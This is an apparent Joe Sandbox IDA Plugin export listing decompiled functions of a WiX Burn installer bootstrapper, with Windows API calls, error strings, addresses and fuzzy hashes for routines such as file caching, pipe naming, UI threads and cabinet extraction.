Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLastSleep
String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
API String ID: 1275171361-1187406825
Opcode ID: b1f18bd66788fb76a853f305932a7d22d214a9457b21accd558bfe18cdb863f4
Instruction ID: f7293cc531ae08b393e817cdc450c94a374ce4f1e31b3778f337de5ec60d63f0
Opcode Fuzzy Hash: b1f18bd66788fb76a853f305932a7d22d214a9457b21accd558bfe18cdb863f4
Instruction Fuzzy Hash: 8C213C76A40225BBE63119188C5AFBF2A6CEF55B50F100117FE14FB3C0D3659D0185E9

Function 004C6F85 Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 227COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 004C6FB2
LeaveCriticalSection.KERNEL32(?), ref: 004C71BE

Strings

Failed to read variable literal flag., xrefs: 004C7199
Unsupported variable type., xrefs: 004C7184
Failed to read variable value as string., xrefs: 004C718B
Failed to read variable value type., xrefs: 004C71A0
Failed to read variable included flag., xrefs: 004C71AE
Failed to set variable value., xrefs: 004C7171
Failed to set variable., xrefs: 004C7192
Failed to read variable name., xrefs: 004C71A7
Failed to read variable count., xrefs: 004C6FD2
Failed to read variable value as number., xrefs: 004C7178

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
API String ID: 3168844106-528957463
Opcode ID: 7eab680e7570354d22d97e8f498aa6b3bb6643b5aa68ca3b91019ec93a80f1b7
Instruction ID: cb90a364d57c97a1d1b572f12b8a343c74a7fbbee976b85f8fa6a72fcc010e22
Opcode Fuzzy Hash: 7eab680e7570354d22d97e8f498aa6b3bb6643b5aa68ca3b91019ec93a80f1b7
Instruction Fuzzy Hash: 3671BE75C0425AABDF11DEA5CC41FAFBBB9EF00754F14412BF900A6290DA389E15DFA4

Function 005044D1 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 00504550
GetLastError.KERNEL32 ref: 00504566
GetFileSizeEx.KERNEL32(00000000,?), ref: 005045BF
GetLastError.KERNEL32 ref: 005045C9
SetFilePointer.KERNEL32(00000000,?,?,00000001), ref: 0050461D
GetLastError.KERNEL32 ref: 00504628
ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00000001), ref: 00504717
CloseHandle.KERNEL32(?), ref: 0050478A

Strings

fileutil.cpp, xrefs: 005044F1, 005045A8, 005045E9, 0050476D

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: File$ErrorLast$CloseCreateHandlePointerReadSize
String ID: fileutil.cpp
API String ID: 3286166115-2967768451
Opcode ID: 8b4bc18d818b6b62890ffc3f7125cfcd27963a815196eca4c65955a5f6a66630
Instruction ID: 30d544bee9b42f6ea5aa240ba76294ae793723d7a4d0b97eb5c2a47d3a7d097c
Opcode Fuzzy Hash: 8b4bc18d818b6b62890ffc3f7125cfcd27963a815196eca4c65955a5f6a66630
Instruction Fuzzy Hash: 698112F6A40226EBEB218E599C45B6F3E98FB41760F11412ABF05EB2C0E775DD019ED0

Function 004C2DBF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 203sleepfiletimeCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 004C2E5F
GetLastError.KERNEL32 ref: 004C2E69
GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 004C2F09
CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 004C2F96
GetLastError.KERNEL32 ref: 004C2FA3
Sleep.KERNEL32(00000064), ref: 004C2FB7
CloseHandle.KERNEL32(?), ref: 004C301F

Strings

4Wu, xrefs: 004C2E5F
%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 004C2F66
pathutil.cpp, xrefs: 004C2E8D

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
String ID: 4Wu$%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
API String ID: 3480017824-3300617194
Opcode ID: 540c9056ac49cabbde0e5cb4c5f503ce77faa48755d6b35ece2abc266bfba305
Instruction ID: 6e85b76f15c7df8f136065fb322e984fa59c36a2ed1399d66621bbafb00921c4
Opcode Fuzzy Hash: 540c9056ac49cabbde0e5cb4c5f503ce77faa48755d6b35ece2abc266bfba305
Instruction Fuzzy Hash: 4B71C57AD01129ABDB709F55DD88FAEB7B8AB08710F00419AF904B7290D7B89E80DF54

Function 00506D50 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 165COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,7556DFD0,?,005072C8,?,?), ref: 00506DA6
SysFreeString.OLEAUT32(00000000), ref: 00506E11
SysFreeString.OLEAUT32(00000000), ref: 00506E89
SysFreeString.OLEAUT32(00000000), ref: 00506EC8

Strings

`5w, xrefs: 00506E11, 00506E89, 00506EC8
term, xrefs: 00506DD9
scheme, xrefs: 00506DB9
label, xrefs: 00506D98

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: String$Free$Compare
String ID: `5w$label$scheme$term
API String ID: 1324494773-2081507386
Opcode ID: 762561c312641e6e2ef7411ad40f67496fefacf4f77d64455cf6eebb456abea9
Instruction ID: b6f9f64d65ed622bee3be0779af1bb980566822eba3964f93e0563c0c5ad5e02
Opcode Fuzzy Hash: 762561c312641e6e2ef7411ad40f67496fefacf4f77d64455cf6eebb456abea9
Instruction Fuzzy Hash: 20513B79901219EFDB25DB94C849FAFBFB8FF04721F2442A8E511A62E0D7319E24DB50

Function 004D4D8D Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 122COMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 004D4DC0
StringFromGUID2.OLE32(?,?,00000027), ref: 004D4DEF
UuidCreate.RPCRT4(?), ref: 004D4E3A
StringFromGUID2.OLE32(?,?,00000027), ref: 004D4E66

Strings

Failed to create pipe guid., xrefs: 004D4DCD
pipe.cpp, xrefs: 004D4E00, 004D4E4D
Failed to allocate pipe name., xrefs: 004D4E2F
Failed to convert pipe guid into string., xrefs: 004D4E0C
BurnPipe.%s, xrefs: 004D4E1B
Failed to allocate pipe secret., xrefs: 004D4E8F

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CreateFromStringUuid
String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
API String ID: 4041566446-2510341293
Opcode ID: 63509895577b9044128c847fdaa014ccb4aa69db4bdd6ac999ddabd507d7054a
Instruction ID: 5252ae68c8d8709afcec9be45e0361cc1100213adf41bf3716966961a256a965
Opcode Fuzzy Hash: 63509895577b9044128c847fdaa014ccb4aa69db4bdd6ac999ddabd507d7054a
Instruction Fuzzy Hash: 6C418C76D40308ABDB20EBE5C945EDEBBF8BB84710F20012BE905BB340D7789945CB95

Function 004DEA7D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,004C548E,?,?), ref: 004DEA9D
GetLastError.KERNEL32(?,004C548E,?,?), ref: 004DEAAA
CreateThread.KERNEL32(00000000,00000000,004DE7B4,?,00000000,00000000), ref: 004DEB03
GetLastError.KERNEL32(?,004C548E,?,?), ref: 004DEB10
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,004C548E,?,?), ref: 004DEB4B
CloseHandle.KERNEL32(00000000,?,004C548E,?,?), ref: 004DEB6A
CloseHandle.KERNEL32(?,?,004C548E,?,?), ref: 004DEB77

Strings

Failed to create the UI thread., xrefs: 004DEB3B
Failed to create initialization event., xrefs: 004DEAD5
uithread.cpp, xrefs: 004DEACB, 004DEB31

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
API String ID: 2351989216-3599963359
Opcode ID: 7c217761c469ceada822783c42dc7950d683f9b48f38275d74642641a5f0d2ab
Instruction ID: 8573eacd3dc65576829c064bd63e6f52577bcd8ab02c2089f6c5c06f1e085b2a
Opcode Fuzzy Hash: 7c217761c469ceada822783c42dc7950d683f9b48f38275d74642641a5f0d2ab
Instruction Fuzzy Hash: 81318A76D01216BBE710EF9A8D95A9FBAB8FF04750F110167F905F7340E734AE0096A5

Function 004DE645 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,004C548E,?,?), ref: 004DE666
GetLastError.KERNEL32(?,?,004C548E,?,?), ref: 004DE673
CreateThread.KERNEL32(00000000,00000000,004DE3C8,00000000,00000000,00000000), ref: 004DE6D2
GetLastError.KERNEL32(?,?,004C548E,?,?), ref: 004DE6DF
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,004C548E,?,?), ref: 004DE71A
CloseHandle.KERNEL32(?,?,?,004C548E,?,?), ref: 004DE72E
CloseHandle.KERNEL32(?,?,?,004C548E,?,?), ref: 004DE73B

Strings

splashscreen.cpp, xrefs: 004DE694, 004DE700
Failed to create UI thread., xrefs: 004DE70A
Failed to create modal event., xrefs: 004DE69E

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
API String ID: 2351989216-1977201954
Opcode ID: 7d04ca40a2696ab3d5f833f6156f07f6c565c39948a3859789deac3b4f601804
Instruction ID: bc7b58f77975c28bf0fff8ee9a7ffa781f0342a0cd5f6bfa5240924cdcf7a222
Opcode Fuzzy Hash: 7d04ca40a2696ab3d5f833f6156f07f6c565c39948a3859789deac3b4f601804
Instruction Fuzzy Hash: 3331A876D0022ABBDB119F9ACC55A9FBFF4AB54710F114167FD10FA340D73489008AE5

Function 004E14E1 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,75572F60,?,?,004C5405,004C53BD,00000000,004C5445), ref: 004E1506
GetLastError.KERNEL32 ref: 004E1519
GetExitCodeThread.KERNEL32(0050B488,?), ref: 004E155B
GetLastError.KERNEL32 ref: 004E1569
ResetEvent.KERNEL32(0050B460), ref: 004E15A4
GetLastError.KERNEL32 ref: 004E15AE

Strings

Failed to wait for operation complete event., xrefs: 004E154A
cabextract.cpp, xrefs: 004E1540, 004E1590, 004E15D5
Failed to get extraction thread exit code., xrefs: 004E159A
Failed to reset operation complete event., xrefs: 004E15DF

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
API String ID: 2979751695-3400260300
Opcode ID: 7119b259f61676cdba39d2ae0d6b76d454268ecc17f427a86fea5186b38f8985
Instruction ID: c7d5383eca433b1ccc771c105a47d409ba5cdd9dd16b8a9a95081d22913f54e5
Opcode Fuzzy Hash: 7119b259f61676cdba39d2ae0d6b76d454268ecc17f427a86fea5186b38f8985
Instruction Fuzzy Hash: 3E31C470A81246BBE7119F668D45ABF7AF8FB44701B10405BF902D6260E734CA409B69

Function 004E15FE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(0050B478,?,00000000,?,004CC1D3,?,004C53BD,00000000,?,004D784D,?,004C566D,004C5479,004C5479,00000000,?), ref: 004E161B
GetLastError.KERNEL32(?,004CC1D3,?,004C53BD,00000000,?,004D784D,?,004C566D,004C5479,004C5479,00000000,?,004C5489,FFF9E89D,004C5489), ref: 004E1625
WaitForSingleObject.KERNEL32(0050B488,000000FF,?,004CC1D3,?,004C53BD,00000000,?,004D784D,?,004C566D,004C5479,004C5479,00000000,?,004C5489), ref: 004E165F
GetLastError.KERNEL32(?,004CC1D3,?,004C53BD,00000000,?,004D784D,?,004C566D,004C5479,004C5479,00000000,?,004C5489,FFF9E89D,004C5489), ref: 004E1669
CloseHandle.KERNEL32(00000000,004C5489,?,00000000,?,004CC1D3,?,004C53BD,00000000,?,004D784D,?,004C566D,004C5479,004C5479,00000000), ref: 004E16B4
CloseHandle.KERNEL32(00000000,004C5489,?,00000000,?,004CC1D3,?,004C53BD,00000000,?,004D784D,?,004C566D,004C5479,004C5479,00000000), ref: 004E16C3
CloseHandle.KERNEL32(00000000,004C5489,?,00000000,?,004CC1D3,?,004C53BD,00000000,?,004D784D,?,004C566D,004C5479,004C5479,00000000), ref: 004E16D2

Strings

Failed to wait for thread to terminate., xrefs: 004E1697
Failed to set begin operation event., xrefs: 004E1653
cabextract.cpp, xrefs: 004E1649, 004E168D

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseHandle$ErrorLast$EventObjectSingleWait
String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
API String ID: 1206859064-226982402
Opcode ID: 44c20a9cedc9e5050e1fc9610db494edb77560ca938897ce7a2993a4127ca3d1
Instruction ID: 299d918c8ff3e82a0cb348e309afe3962b8bd3b25416be77d6341cb8fc479c75
Opcode Fuzzy Hash: 44c20a9cedc9e5050e1fc9610db494edb77560ca938897ce7a2993a4127ca3d1
Instruction Fuzzy Hash: 25213732581623B7D7215B73CC49B5BBAA0BF04723F050226E90465AB0D379EC60CADD

Function 004D41EC Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00500523: EnterCriticalSection.KERNEL32(0052B5FC,00000000,?,?,?,004D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,004C54FA,?), ref: 00500533
Part of subcall function 00500523: LeaveCriticalSection.KERNEL32(0052B5FC,?,?,0052B5F4,?,004D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,004C54FA,?), ref: 0050067A

OpenEventLogW.ADVAPI32(00000000,Application), ref: 004D4212
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 004D421E
ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,005139D4,00000000), ref: 004D426B
CloseEventLog.ADVAPI32(00000000), ref: 004D4272

Strings

txt, xrefs: 004D41F2
_Failed, xrefs: 004D41F7
logging.cpp, xrefs: 004D4242
Failed to open Application event log, xrefs: 004D424C
Application, xrefs: 004D420C
Setup, xrefs: 004D41FC

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
String ID: Application$Failed to open Application event log$Setup$_Failed$logging.cpp$txt
API String ID: 1844635321-1389066741
Opcode ID: 8212d8e33190f8f2fe63e05c0f0f79c225168ad5d1586afc44ad57089c354b83
Instruction ID: 2478a210d9b50eeffdd9e940036d0c7615df0794e1e1e551bb4097e631397aea
Opcode Fuzzy Hash: 8212d8e33190f8f2fe63e05c0f0f79c225168ad5d1586afc44ad57089c354b83
Instruction Fuzzy Hash: 58F0D136A852723BBB3126621C3EEBF1C6CEAC2F61701001AFC00F1280EB589D4180F9

Function 004D93FE Relevance: 16.7, APIs: 2, Strings: 9, Instructions: 226COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 004D949E
GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 004D94C6

Strings

Failed to get file hash., xrefs: 004D94F0
Could not close verify handle., xrefs: 004D9655
Failed to allocate string., xrefs: 004D9534
0, xrefs: 004D955E
Failed to allocate memory, xrefs: 004D946F
$, xrefs: 004D959D
Could not verify file %ls., xrefs: 004D9607
Failed to encode file hash., xrefs: 004D9551
cache.cpp, xrefs: 004D94E6, 004D95FA, 004D964B

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast
String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
API String ID: 1452528299-4263581490
Opcode ID: 87c20bc246743a8118c58eb9f9828e8884f60c60ac9b7d5e36fe600d826e9ce5
Instruction ID: ef27d9c43b5174a70e15482bce950155691e36a6a9c4be73c046a2bc2baeb7a0
Opcode Fuzzy Hash: 87c20bc246743a8118c58eb9f9828e8884f60c60ac9b7d5e36fe600d826e9ce5
Instruction Fuzzy Hash: BA718172D00229ABDB11DF95C855BEEBBB8AF08710F11012BE910F7381E7799D458BA8

Function 004DE56C Relevance: 16.6, APIs: 11, Instructions: 86windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004DE577
DefWindowProcW.USER32(?,00000082,?,?), ref: 004DE5B5
SetWindowLongW.USER32(?,000000EB,00000000), ref: 004DE5C2
SetWindowLongW.USER32(?,000000EB,?), ref: 004DE5D1
DefWindowProcW.USER32(?,?,?,?), ref: 004DE5DF
CreateCompatibleDC.GDI32(?), ref: 004DE5EB
SelectObject.GDI32(00000000,00000000), ref: 004DE5FC
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 004DE61E
SelectObject.GDI32(00000000,00000000), ref: 004DE626
DeleteDC.GDI32(00000000), ref: 004DE629
PostQuitMessage.USER32(00000000), ref: 004DE637

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
String ID:
API String ID: 409979828-0
Opcode ID: 9c2c3ea3405582d904b89f402332e5a50ba786312d49e4e1a54ca825c0b51337
Instruction ID: f87c4aa8ee9c0f107419c1b0d7eb23247de2426d580ddcf52b3067178eb97779
Opcode Fuzzy Hash: 9c2c3ea3405582d904b89f402332e5a50ba786312d49e4e1a54ca825c0b51337
Instruction Fuzzy Hash: 0B21B032100104BFEB146FB5DC6CDBF3FA8EF59360B15451AF6168A2B0D7358811EB60

Function 004DA13A Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 222COMMON

Download Yara Rule

Strings

Failed to copy source path., xrefs: 004DA31A
Failed to combine last source with source., xrefs: 004DA210
WixBundleOriginalSource, xrefs: 004DA1B7
Failed to get current process directory., xrefs: 004DA1F3
Failed to combine layout source with source., xrefs: 004DA2A4
Failed to get bundle layout directory property., xrefs: 004DA287
WixBundleLastUsedSource, xrefs: 004DA1A1
WixBundleLayoutDirectory, xrefs: 004DA26C

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Find$CloseFileFirstlstrlen
String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
API String ID: 2767606509-3003062821
Opcode ID: 70f0e6676fcc0aae991df07143dedcc0eceed5453157f0a887f290e86a9f896d
Instruction ID: 971da60af5f0dd35bc6c0eae23f788013bab8080c062386f62fa447700a330e8
Opcode Fuzzy Hash: 70f0e6676fcc0aae991df07143dedcc0eceed5453157f0a887f290e86a9f896d
Instruction Fuzzy Hash: 36719D71D01219ABDF11DFA9C855AEEBBB9BF08310F14012BE900B7390E7799D51CB6A

Function 004C3076 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 004C30C1
GetLastError.KERNEL32 ref: 004C30C7
ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 004C3121
GetLastError.KERNEL32 ref: 004C3127
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004C31DB
GetLastError.KERNEL32 ref: 004C31E5
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004C323B
GetLastError.KERNEL32 ref: 004C3245

Strings

pathutil.cpp, xrefs: 004C30EB

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
String ID: pathutil.cpp
API String ID: 1547313835-741606033
Opcode ID: 698b12539fb3b162617e6e18e7ee84e0ad4c28ae210acfef92fea63d17846d08
